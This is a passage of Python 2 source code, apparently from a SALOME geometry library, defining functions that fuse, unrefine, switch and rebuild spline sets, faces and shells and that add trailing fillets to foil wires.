Input spline sets must be coinciding, that is sharing boundary nodes or edge.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if isinstance(compounds, list) == False: print "[X] The second argument (compounds) should be an array."; return
# Get the input shape(s)
compounds = GetGUISelection(compounds)
compounds = GetObject(compounds)
#-
# Check the input shape existence
if "error" in compounds or None in compounds: return
#-
# Check the number of selected objects
if len(compounds) != 2:
print "[X] Exactly two objects should be selected."
return
#-
# Check the input shape characteritics
for object in compounds:
nb_edges = int(geompy.WhatIs(object).split("\n")[2].split(": ")[1])
if nb_edges < 2:
print "[X] Input objects should contain at least two edges"
return
#-
else:# All checks done
# Get the sub-shapes
[compound1, compound2] = GetSubShapes(compounds)
#-
# Check compound position
side_by_side = True
n = 0
for compound1_edge in compound1[1]:# For each edge of the first compound...
compound1_edge_vertexes = geompy.SubShapeAll(compound1_edge, geompy.ShapeType["VERTEX"])
for compound2_edge in compound2[1]:
min_distance1 = geompy.MinDistance(compound2_edge, compound1_edge_vertexes[0])
min_distance2 = geompy.MinDistance(compound2_edge, compound1_edge_vertexes[1])
if min_distance1 <= tol and min_distance2 <= tol:
side_by_side = False
del compound1[1][n]
break
n += 1
#-
if side_by_side == True:
# Check the number of edges
nb_edges1 = int(geompy.WhatIs(compound1[-1]).split("\n")[2].split(": ")[1])
nb_edges2 = int(geompy.WhatIs(compound2[-1]).split("\n")[2].split(": ")[1])
if nb_edges1 != nb_edges2:
print "[X] Input compounds should have a same number of edges"
return
#-
fused_splines = []
for compound1_edge in compound1[1]:# For each edge of the first compound...
# Get the touching edge in the second compound
closest_compound2_edge = None
min_distance = 1e99
for compound2_edge in compound2[1]:
distance = geompy.MinDistance(compound2_edge, compound1_edge)
if distance <= min_distance:
min_distance = distance
closest_compound2_edge = compound2_edge
#-
# Fuse edges
fused_spline = FuseSplines([compound1_edge, closest_compound2_edge], np = np, curv = curv, tol = tol, add = False)
#-
# Add the fused spline to the list
fused_splines.append(fused_spline)
#-
# Create the fused spline compound
fused_spline_compound = geompy.MakeCompound(fused_splines)
#-
else:
fused_spline_compound = geompy.MakeCompound(compound1[1] + compound2[1])
# Add and return the resulting shape(s)
if add == True:
AddToStudy(fused_spline_compound, "FusedSplineSets")
return fused_spline_compound
#-
fss = FuseSplineSets
def UnrefineSplineSet( fact = 2, compound = None, add = True, infa = False ):
    """
    Description:
        Unrefines a spline set.
    Arguments:
        # fact
            Description: The unrefinement factor. For example, if equals 2, one spline over two is kept.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 2
        # compound
            Description: The spline set to unrefine.
            Type: Compounds
            GUI selection: yes
            Selection by name: yes
            Recursive: yes
            Default value: None
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
    Returned Values:
        "dim" value: -
        "single" value: -
        Type: Compound of Edges
        Number: 1
        Name: "UnrefinedSplineSet"
    Conditions of use:
        -
    """
    # Get the input shape(s)
    compound = GetGUISelection(compound)
    compound = GetObject(compound)
    #-
    # Make this function recursive (process each element of a list input)
    if isinstance(compound, list):
        return_list = []
        for sub_object in compound:
            return_list.append(UnrefineSplineSet(fact, sub_object, add, infa))
        return return_list
    #-
    # Check the input shape existence
    if "error" in [compound] or None in [compound]: return
    #-
    # Check the input shape characteritics
    nb_edges = int(geompy.WhatIs(compound).split("\n")[2].split(": ")[1])
    if nb_edges < 2:
        print "[X] The selected object should be a compound containing several edges."
        return
    #-
    # Set father object
    # NOTE(review): father is assigned but not passed to AddToStudy below,
    # so "infa" currently has no visible effect — confirm intent.
    father = None
    if infa == True: father = compound
    #-
    if False: pass
    else:# All checks done
        # Get the sub-shapes (compound[1] presumably holds the edge list —
        # TODO confirm GetSubShapes convention)
        compound = GetSubShapes(compound)
        #-
        # Unrefine the edge compound
        # NOTE(review): this appends edges i and i+1 for every i multiple of
        # fact (while enough edges remain); for fact == 2 that keeps pairs of
        # consecutive edges rather than every other edge as the docstring
        # suggests — confirm the intended sampling.
        unrefined_edges = []
        for i in range(nb_edges - 1):
            if i%fact == 0 and nb_edges - i > fact:
                unrefined_edges.append(compound[1][i])
                unrefined_edges.append(compound[1][i + 1])
        #-
        # Create the unrefined edge compound
        unrefined_compound = geompy.MakeCompound(unrefined_edges)
        #-
        # Add and return the resulting shape(s)
        if add == True:
            AddToStudy(unrefined_compound, "UnrefinedSplineSet")
        return unrefined_compound
        #-
uss = UnrefineSplineSet
def SwitchSplineSet( compound = None, np = "auto", add = True, infa = False ):
"""
Description:
Sitches the orientation of a spline set.
Arguments:
# compound
Description: The spline set to switch.
Type: Compounds
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# np
Description: See here. In this case, if equals "auto", the number of points is set equal to the number of splines in the input spline set.
Type: Integer or String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "auto"
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: false
Returned Values:
"dim" value: -
"single" value: -
Type: Compound of Edges
Number: 1
Name: "SwitchedSplineSet"
Conditions of use:
-
"""
# Get the input shape(s)
compound = GetGUISelection(compound)
compound = GetObject(compound)
#-
# Make this function recursive
if isinstance(compound, list):
return_list = []
for sub_object in compound:
return_list.append(SwitchSplineSet(sub_object, np, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [compound] or None in [compound]: return
#-
# Check the input shape characteritics
nb_edges = int(geompy.WhatIs(compound).split("\n")[2].split(": ")[1])
if nb_edges < 2:
print "[X] The selected object should be a compound containing several edges."
return
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Get the sub-shapes
compound = GetSubShapes(compound)
#-
if np == "auto":
np = len(compound[1])
# Create splines
splines = []
for parameter in [n / float(np - 1) for n in range(np)]:
spline_vertexes = []
for edge in compound[1]:
spline_vertex = geompy.MakeVertexOnCurve(edge, parameter)
spline_vertexes.append(spline_vertex)
spline = geompy.MakeInterpol(spline_vertexes)
splines.append(spline)
#-
# Put them into a compound
switched_compound = geompy.MakeCompound(splines)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(switched_compound, "SwitchedSplineSet")
return switched_compound
#-
sss = SwitchSplineSet
def RebuildFace( np = 30, face = None, rel = False, switch = False, tol = 1e-7, single = True, add = True, infa = False, dim = 2 ):
    """
    Description:
        Rebuilds a face using its iso-lines.
    Arguments:
        # np
            Description: See here. In addition, if this argument is a list of 2 integers, the first number gives the number of isolines created to rebuild the face and the second number gives the number of points used to create each isoline (see the above script example).
            Type: Integer or List of 2 Integers
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 30
        # face
            Description: The face to rebuild.
            Type: Face
            GUI selection: yes
            Selection by name: yes
            Recursive: yes
            Default value: None
        # rel
            Description: If equals True, the function try to relimit the rebuild face using the source face edges.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # switch
            Description: If equals True, the iso-curves are switched from iso-u to iso-v.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # tol
            Description: See here.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1e-7
        # single
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # dim
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 2
    Returned Values:
        "dim" value: 0
        "single" value: False
        Type: Vertex
        Number: n
        Name: "RebuiltFace (Vertex)"
        "dim" value: 0
        "single" value: True
        Type: Compound of Vertexes
        Number: 1
        Name: "RebuiltFace (Vertexes)"
        "dim" value: 1
        "single" value: False
        Type: Edge
        Number: n
        Name: "RebuiltFace (Edge)"
        "dim" value: 1
        "single" value: True
        Type: Compound of Edges
        Number: 1
        Name: "RebuiltFace (Edges)"
        "dim" value: 2
        "single" value: -
        Type: Face
        Number: 1
        Name: "RebuiltFace"
    Conditions of use:
        -
    """
    if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
    if dim not in [0, 1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
    # Get the input shape(s)
    face = GetGUISelection(face)
    face = GetObject(face)
    #-
    # Make this function recursive (process each element of a list input)
    if isinstance(face, list):
        return_list = []
        for sub_object in face:
            return_list.append(RebuildFace(np, sub_object, rel, switch, tol, single, add, infa, dim))
        return return_list
    #-
    # Get input values: a scalar np applies to both parametric directions
    if isinstance(np, list) == False:
        np = [np, np]
    #-
    # Check the input shape existence
    if "error" in [face] or None in [face]: return
    #-
    # Set father object (passed to AddToStudy below when infa is True)
    father = None
    if infa == True: father = face
    #-
    if False: pass
    else:# All checks done
        # Get the sub-shapes (face[1] presumably holds the face edges and
        # face[-1] the face itself — TODO confirm GetSubShapes convention)
        face = GetSubShapes(face)
        #-
        # Create the iso curves: np[0]+1 curves of np[1]+1 points each,
        # sampling the surface at regular (u, v) parameters
        iso_curves = []
        if dim == 0: iso_curve_vertexes_all = []
        for i in [n / float(np[0]) for n in range(np[0] + 1)]:
            iso_curve_vertexes = []
            for j in [n / float(np[1]) for n in range(np[1] + 1)]:
                if switch == True:
                    # switch swaps the roles of u and v
                    new_iso_curve_vertex = geompy.MakeVertexOnSurface(face[-1], j, i)
                else:
                    new_iso_curve_vertex = geompy.MakeVertexOnSurface(face[-1], i, j)
                iso_curve_vertexes.append(new_iso_curve_vertex)
            if dim == 0: iso_curve_vertexes_all += iso_curve_vertexes
            if dim != 0:
                new_iso_curve = geompy.MakeInterpol(iso_curve_vertexes)
                iso_curves.append(new_iso_curve)
        #-
        if dim == 0:
            to_return = iso_curve_vertexes_all
            to_return_name = "RebuiltFace (Vertex)"
            if single == True:
                # Put them into a compound
                vertex_compound = geompy.MakeCompound(iso_curve_vertexes_all)
                #-
                to_return = vertex_compound
                to_return_name = "RebuiltFace (Vertexes)"
        else:
            # Put them into a compound
            iso_curve_compound = geompy.MakeCompound(iso_curves)
            #-
            if dim == 1:# If the output dimension is 1...
                to_return = iso_curves
                to_return_name = "RebuiltFace (Edge)"
                if single == True:
                    to_return = iso_curve_compound
                    to_return_name = "RebuiltFace (Edges)"
            else:# If the output dimension is 2...
                # Create the filling from this compound
                filling = geompy.MakeFilling(iso_curve_compound, theMinDeg = 10, theMaxDeg = 20, theTol2D = 1e-5, theTol3D = 1e-5)
                #-
                # Relimitate the filling: project the source face edges onto
                # the filling, partition it, and keep the partition face whose
                # vertexes all lie (within tol) on the projected edges
                # TODO improve that ?
                rebuild_face = filling
                if rel == True:
                    #face_wire = geompy.SubShapeAll(face[-1], geompy.ShapeType["WIRE"])[0]
                    #fused_face = geompy.MakeFaceFromSurface(filling, face_wire)
                    projected_edges = []
                    for edge in face[1]:
                        try:
                            projected_edge = geompy.MakeProjection(edge, filling)
                            projected_edges.append(projected_edge)
                        except:
                            # Best-effort: skip edges whose projection fails
                            pass
                    if len(projected_edges) > 0:
                        filling_partition = geompy.MakePartition([filling], projected_edges)
                        filling_partition_faces = geompy.SubShapeAll(filling_partition, geompy.ShapeType["FACE"])
                        for filling_partition_face in filling_partition_faces:
                            filling_partition_face_vertexes = geompy.SubShapeAll(filling_partition_face, geompy.ShapeType["VERTEX"])
                            match = True
                            for filling_partition_face_vertex in filling_partition_face_vertexes:
                                projected_edge_compound = geompy.MakeCompound(projected_edges)
                                min_distance = geompy.MinDistance(filling_partition_face_vertex, projected_edge_compound)
                                if min_distance > tol:
                                    match = False
                            if match == True:
                                rebuild_face = filling_partition_face
                                break
                #-
                to_return = rebuild_face
                to_return_name = "RebuiltFace"
        # Add and return the resulting shape(s)
        if add == True:
            slow_add = False
            if not isinstance(to_return, list) or single == True: slow_add = True
            AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
            if slow_add == False:
                if salome.sg.hasDesktop():
                    salome.sg.updateObjBrowser(1)
        return to_return
        #-
rf = RebuildFace
def FuseCoplanarFaces( faces = [None], add = True ):
"""
Description:
Completely fuses two coplanar faces.
Arguments:
# faces
Description: The faces to fuse.
Type: List of 2 Faces
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Face
Number: 1
Name: "FusedFace"
Conditions of use:
-
"""
if isinstance(faces, list) == False: print "[X] The first argument (faces) should be an array."; return
# Get the input shape(s)
faces = GetGUISelection(faces)
faces = GetObject(faces)
#-
# Check the input shape existence
if "error" in faces or None in faces: return
#-
# Check the number of selected objects
if len(faces) != 2:
print "[X] Two shapes should be selected."
return
#-
else:# All checks done
# Get the plane normal
normal = geompy.GetNormal(faces[0])
#-
# Extrude the faces
extrusion_distance = 1e3
cutting_plane_position = extrusion_distance / 2
extruded_faces = [
geompy.MakePrismVecH(faces[0], normal, extrusion_distance),
geompy.MakePrismVecH(faces[1], normal, extrusion_distance)
]
#-
# Fuse the extruded faces
fused_extension = geompy.MakeFuse(extruded_faces[0], extruded_faces[1])
#-
# Get the length of the cutting plane
bounding_box = geompy.BoundingBox(fused_extension)
dx = abs(bounding_box[1] - bounding_box[0])
dy = abs(bounding_box[2] - bounding_box[1])
dz = abs(bounding_box[3] - bounding_box[2])
plane_length = 2 * dx + 2 * dy + 2 * dz
#-
# Create the cutting plane
cutting_plane = geompy.MakePlaneFace(faces[0], plane_length)
cutting_plane = geompy.MakeTranslationVectorDistance(cutting_plane, normal, cutting_plane_position)
#-
# Cut the fused extrusion with the plane
fused_face = geompy.MakeCommon(fused_extension, cutting_plane)
#-
# Remove shells (optional)
random_vertex = geompy.MakeVertex(0, 0, 0)# This vertex is only used to make the below partition possible
fused_face = geompy.MakePartition([fused_face], [random_vertex], Limit = geompy.ShapeType["FACE"])
#-
# Move the face to the original position
fused_face = geompy.MakeTranslationVectorDistance(fused_face, normal, - cutting_plane_position)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(fused_face, "FusedFace")
return fused_face
#-
fcf = FuseCoplanarFaces
def FuseShellFaces( shell = None, np = 400, strat = "rigid", curv = True, add = True, infa = False, dim = 2 ):
"""
Description:
Creates a single face from a shell.
Arguments:
# shell
Description: The shell to fuse.
Type: Shell
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: [None]
# np
Description: See here. In this case, the number of point is approximatively respected.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 400
# strat
Description: The strategy. If equals "flex", the function tries to insert smooth transitions between sub-faces of the input shell (the boundary wire is then modified). Equals "rigid" otherwise (necessitates the input sub-faces to be as tangential as possible).
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "rigid"
# curv
Description: See here. In this case, applies only for the boundary wire reconstruction when strat equals "flex".
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: 0
"single" value: -
Type: Compound of Vertexes
Number: 1
Name: "FusedShell (Vertexes)"
"dim" value: 2
"single" value: -
Type: Face
Number: 1
Name: "FusedShell"
Conditions of use:
The shell should have only one boundary wire.
Also, to be fused efficiently, the shell faces should have reasonable aspect ratio and local curvature.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if dim not in [0, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
shell = GetGUISelection(shell)
shell = GetObject(shell)
#-
# Make this function recursive
if isinstance(shell, list):
return_list = []
for sub_object in shell:
return_list.append(FuseShellFaces(sub_object, np, strat, curv, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [shell] or None in [shell]: return
#-
# Set father object
father = None
if infa == True: father = shell
#-
if False: pass
else:# All checks done
# Check if the input shape is "shell-shaped"
shell_faces = GetSubShapes(shell)[2]
try:
shell = geompy.MakeShell(shell_faces)
except:
print "[X] The input 2D shape should be \"shell-shaped\"."; return
#-
# Get the input shell boundary wire
boundary_wire = geompy.GetFreeBoundary(shell)[1][0]
#-
# Get the input shell area
area = geompy.BasicProperties(shell)[1]
#-
# Get the cell size
cell_size = math.sqrt(area / np)
#-
# Mesh the input shell
mesh = smesh.Mesh(shell)
netgen_algo = mesh.Triangle(algo = smeshBuilder.NETGEN_1D2D)
netgen_hypo = netgen_algo.Parameters()
netgen_hypo.SetMinSize(cell_size)
netgen_hypo.SetMaxSize(cell_size)
netgen_hypo.SetFineness(2)
mesh.Compute()
#-
# Remove internal vertexes
if strat == "flex":# not "rigid"
# Get the internal edges
all_edges_group = PutAllSubShapesInAGroup(1, shell, add = False)
internal_edge_compound = geompy.MakeCut(all_edges_group, boundary_wire)
geompy.addToStudy(internal_edge_compound, "internal_edges")
#-
# Create the internal node mesh group
internal_nodes_mesh_filter = smesh.GetFilterFromCriteria([smesh.GetCriterion(SMESH.NODE, SMESH.FT_BelongToGeom, SMESH.FT_Undefined, internal_edge_compound)])
internal_nodes_mesh_filter.SetMesh(mesh.GetMesh())
internal_nodes_mesh_group = mesh.GroupOnFilter(SMESH.NODE, "internal_nodes", internal_nodes_mesh_filter)
#-
# Delete the internal nodes
mesh.RemoveGroupWithContents(internal_nodes_mesh_group)
#mesh.RemoveGroupWithContents(edge_node_mesh_group)
#-
# Delete temporary geometrical shapes
#http://www.salome-platform.org/forum/forum_10/366900504#419952388
so = salome.ObjectToSObject(internal_edge_compound)
sb = salome.myStudy.NewBuilder()
sb.RemoveObjectWithChildren(so)
#-
#-
# Create the node group
node_group = mesh.CreateEmptyGroup( SMESH.NODE, "nodes" )
node_group.AddFrom(mesh.GetMesh())
#-
# Create vertexes from nodes
vertex_compound = MakeVertexesFromMeshGroup(node_group, add = False)
#-
# Delete the shell, mesh and hypos
so = salome.ObjectToSObject(shell)
sb = salome.myStudy.NewBuilder()
sb.RemoveObjectWithChildren(so)
a_study_builder = salome.myStudy.NewBuilder()
SO = salome.myStudy.FindObjectIOR(salome.myStudy.ConvertObjectToIOR(node_group))
if SO: a_study_builder.RemoveObjectWithChildren(SO)
SO = salome.myStudy.FindObjectIOR(salome.myStudy.ConvertObjectToIOR(mesh.GetMesh()))
if SO: a_study_builder.RemoveObjectWithChildren(SO)
SO = salome.myStudy.FindObjectIOR(salome.myStudy.ConvertObjectToIOR(netgen_hypo))
if SO: a_study_builder.RemoveObjectWithChildren(SO)
#-
if dim == 0:# If the output dimension is 0...
# Return the resulting shape(s)
if add == True:
AddToStudy(vertex_compound, "FusedShell (Vertexes)", father)
return vertex_compound
#-
else:
# Create the smoothing surface
vertex_list = geompy.SubShapeAll(vertex_compound, geompy.ShapeType["VERTEX"])
smoothing_surface = geompy.MakeSmoothingSurface(vertex_list, 100, 15)
#-
if strat == "flex":# not "rigid"
zero_size = cell_size / 100.0
# Get boundary vertexes to ignore
boundary_vertexes = GetSubShapes(boundary_wire)[0]
vertexes_to_ignore = []
for boundary_vertex in boundary_vertexes:
distance = geompy.MinDistance(boundary_vertex, vertex_compound)
if distance > zero_size:
vertexes_to_ignore.append(boundary_vertex)
#-
# Fuse boundary edges
boundary_edges = GetSubShapes(boundary_wire)[1]
new_boundary_edges = []
for vertex_to_ignore in vertexes_to_ignore:# For each vertex to ignore...
# Get touching boundary edges
touching_edges = []
for boundary_edge in boundary_edges:
distance = geompy.MinDistance(boundary_edge, vertex_to_ignore)
if distance < zero_size:
touching_edges.append(boundary_edge)
#-
# Create new boundary edges
max_nb_touching_vertexes = 0
new_boundary_separated_edges = []
for touching_edge in touching_edges:# For each touching edge...
# Get touching vertexes
touching_vertexes = []
for vertex in vertex_list:
distance = geompy.MinDistance(vertex, touching_edge)
if distance < zero_size:
touching_vertexes.append(vertex)
#-
nb_touching_vertexes = len(touching_vertexes)
if nb_touching_vertexes > max_nb_touching_vertexes:
max_nb_touching_vertexes = nb_touching_vertexes
# Create a spline from them
touching_vertex_compound = geompy.MakeCompound(touching_vertexes)
new_boundary_separated_edge = MakeCurveFromUnsortedVertexes([touching_vertex_compound, vertex_to_ignore], add = False)
new_boundary_separated_edges.append(new_boundary_separated_edge)
#-
#-
# Fuse them together
new_boundary_edge = FuseSplines(new_boundary_separated_edges, np = max_nb_touching_vertexes, curv = curv, add = False)
new_boundary_edges.append(new_boundary_edge)
#-
#-
# Replace the boundary wire
boundary_wire = geompy.MakeWire(new_boundary_edges)
#-
# Relimitate the smoothing surface
fused_face = geompy.MakeFaceFromSurface(smoothing_surface, boundary_wire)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(fused_face, "FusedShell", father)
return fused_face
#-
fsf = FuseShellFaces
def FuseGroupFaces( group = None, np = 400, add = True ):
"""
Description:
Fuse faces inside a face group, be it in a solid or a shell.
Arguments:
# group
Description: The face group to fuse.
Type: Group of Faces
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here. In this case, the number of point is approximatively respected.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 400
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Solid or Shell
Number: 1
Name: "SolidWithFusedGroup" or "ShellWithFusedGroup"
Conditions of use:
-
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
# Get the input shape(s)
group = GetGUISelection(group, uniq = True)
group = GetObject(group)
#-
# Check the input shape existence
if "error" in [group] or None in [group]: return
#-
if False: pass
else:# All checks done
# Get the parent shape
main_shape = group.GetMainShape()
#-
# Get the main shape type
nb_faces = geompy.NumberOfFaces(main_shape)
nb_solids = geompy.NumberOfSolids(main_shape)
main_shape_type = None
if nb_solids == 1:
main_shape_type = "solid"
elif nb_solids == 0:
if nb_faces > 0:
main_shape_type = "shell"
if main_shape_type == None:
print "[X] The main shape should be a solid or a shell."; return
#-
# Fuse all faces in the group
fused_face = FuseShellFaces(group, np, add = False)
#-
# Create a group of resting faces
all_faces_group = geompy.CreateGroup(main_shape, geompy.ShapeType["FACE"])
solid_face_list = geompy.SubShapeAll(main_shape, geompy.ShapeType["FACE"])
for face in solid_face_list:
face_id = geompy.GetSubShapeID(main_shape, face)
geompy.AddObject(all_faces_group, face_id)
resting_group = geompy.CutGroups(all_faces_group, group)
#-
# Create a new shell
new_shell = geompy.MakeShell([resting_group, fused_face])
#-
if main_shape_type == "shell":
# Add and return the resulting shape(s)
if add == True:
AddToStudy(new_shell, "ShellWithFusedGroup")
return new_shell
#-
else:
# Create a solid from the shell
new_solid = geompy.MakeSolid([new_shell])
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(new_solid, "SolidWithFusedGroup")
return new_solid
#-
fgf = FuseGroupFaces
def RemoveFaceExtraEdges( face = None, tol = 1e-7, add = True, infa = False ):
"""
Description:
Removes zero-length edges in a face.
Arguments:
# face
Description: The face from which to remove extra edges.
Type: Face
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Face
Number: 1
Name: "FaceWithoutExtraEdges"
Conditions of use:
-
"""
# Get the input shape(s)
face = GetGUISelection(face)
face = GetObject(face)
#-
# Make this function recursive
if isinstance(face, list):
return_list = []
for sub_object in face:
return_list.append(RemoveFaceExtraEdges(sub_object, tol, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [face] or None in [face]: return
#-
# Set father object
father = None
if infa == True: father = face
#-
if False: pass
else:# All checks done
# Get the face normal
normal = geompy.GetNormal(face)
#-
# Extrude the face_name
extruded_face = geompy.MakePrismVecH(face, normal, 1000)
#-
# Remove the extra edges
fixed_solid = geompy.RemoveExtraEdges(extruded_face)
#-
# Get the faces
exploded_faces = geompy.SubShapeAll(fixed_solid, geompy.ShapeType["FACE"])
#-
# Get the fixed face
for exploded_face in exploded_faces:
vertexes = geompy.SubShapeAll(exploded_face, geompy.ShapeType["VERTEX"])
match = True
for vertex in vertexes:
min_distance = geompy.MinDistance(vertex, face)
if min_distance > tol:
match = False
if match == True:
fixed_face = exploded_face
break
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(fixed_face, "FaceWithoutExtraEdges", father)
return fixed_face
#-
rfee = RemoveFaceExtraEdges
def MakeFoilTrailingFillets( thick, wire = None, angle = 25, tol = 1e-7, add = True, infa = False ):
"""
Description:
Add a trailing fillet to a foil wire.
Arguments:
# thick
Description: The desired approximative trailing edge thickness.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# wire
Description: The input foil.
Type: Wire
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# angle
Description: The angle in degrees between two touching sub-edges below which a fillet has to be done.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 25
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Face
Number: 1
Name: "FoilWithTrailingFillet"
Conditions of use:
The input foil should be a planar closed wire having no trailing edge thickness, that is having (a) sharp trailing edge(s) ending by a vertex common to the upper and lower edges of the foil.
"""
input_shape = wire
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(MakeFoilTrailingFillets(thick, sub_object, angle, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
# Set father object
father = None
if infa == True: father = input_shape
#-
wire = input_shape
if False: pass
else:# All checks done
small_value = 1e-3
wire_length = geompy.BasicProperties(wire)[0]
infinite_distance = 1e2 * wire_length
cut_plane_size = 3 * thick
wire_edges = GetSubShapes(wire)[1]
try:
wire = geompy.MakeWire(wire_edges)
except:
print "[X] The input shape should be \"wire-shaped\"."; return
# Check the wire is closed
if GetBoundaryVertexes(wire, add = False) != None:
print "[X] The input wire should be closed."; return
#-
# Create a face from the wire
wire_face = geompy.MakeFace(wire, isPlanarWanted = True)
#-
# Get vertexes
wire_vertex_list = GetSubShapes(wire)[0]
#-
# Get trailing vertexes
trailing_vertex_list = []
cut_normal_list = []
thickness_slope_list = []
for vertex in wire_vertex_list:# For each vertex of the wire...
# Get the edge(s) touching the vertex
touching_edge_compound = geompy.GetShapesNearPoint(wire, vertex, geompy.ShapeType["EDGE"])
touching_edge_list = geompy.SubShapeAll(touching_edge_compound, geompy.ShapeType["EDGE"])
#-
# Create local edge direction vectors
direction_vector_list = []
if len(touching_edge_list) == 1:
touching_edge = touching_edge_list[0]
direction_vector_tip_vertex_1 = geompy.MakeVertexOnCurve(touching_edge, 0.0 + small_value)
direction_vector_tip_vertex_2 = geompy.MakeVertexOnCurve(touching_edge, 1.0 - small_value)
direction_vector_1 = geompy.MakeVector(vertex, direction_vector_tip_vertex_1)
direction_vector_2 = geompy.MakeVector(vertex, direction_vector_tip_vertex_2)
direction_vector_list.append(direction_vector_1)
direction_vector_list.append(direction_vector_2)
else:
for touching_edge in touching_edge_list:
direction_vector_tip_vertex_parameter_1 = 0.0 + small_value
direction_vector_tip_vertex_parameter_2 = 1.0 - small_value
vertex_1 = geompy.MakeVertexOnCurve(touching_edge, 0.0)
vertex_2 = geompy.MakeVertexOnCurve(touching_edge, 1.0)
distance_1 = geompy.MinDistance(vertex_1, vertex)
distance_2 = geompy.MinDistance(vertex_2, vertex)
direction_vector_vertex_list = []
if distance_2 > distance_1:
direction_vector_tip_vertex = geompy.MakeVertexOnCurve(touching_edge, 0.0 + small_value)
else:
direction_vector_tip_vertex = geompy.MakeVertexOnCurve(touching_edge, 1.0 - small_value)
direction_vector = geompy.MakeVector(vertex, direction_vector_tip_vertex)
direction_vector_list.append(direction_vector)
#-
# Detect sharp angles
[direction_vector_1, direction_vector_2] = direction_vector_list
local_angle = geompy.GetAngle(direction_vector_1, direction_vector_2)
if local_angle < angle:
# Check if this is an open or closed angle
tmp_vertex_1 = geompy.MakeVertexOnCurve(direction_vector_1, 1.0)
tmp_vertex_2 = geompy.MakeVertexOnCurve(direction_vector_2, 1.0)
tmp_edge = geompy.MakeEdge(tmp_vertex_1, tmp_vertex_2)
tmp_vertex = geompy.MakeVertexOnCurve(tmp_edge, 0.5)
distance = geompy.MinDistance(tmp_vertex, wire_face)
if distance > tol:
continue
#-
# Get the cut normal
normalized_direction_vector_1 = GetNormalizedVector(direction_vector_1, add = False)
normalized_direction_vector_2 = GetNormalizedVector(direction_vector_2, add = False)
tip_vertex_1 = geompy.MakeVertexOnCurve(normalized_direction_vector_1, 1)
tip_vertex_2 = geompy.MakeVertexOnCurve(normalized_direction_vector_2, 1)
tmp_edge = geompy.MakeEdge(tip_vertex_1, tip_vertex_2)
cut_normal_tip_vertex = geompy.MakeVertexOnCurve(tmp_edge, 0.5)
cut_normal = geompy.MakeVector(vertex, cut_normal_tip_vertex)
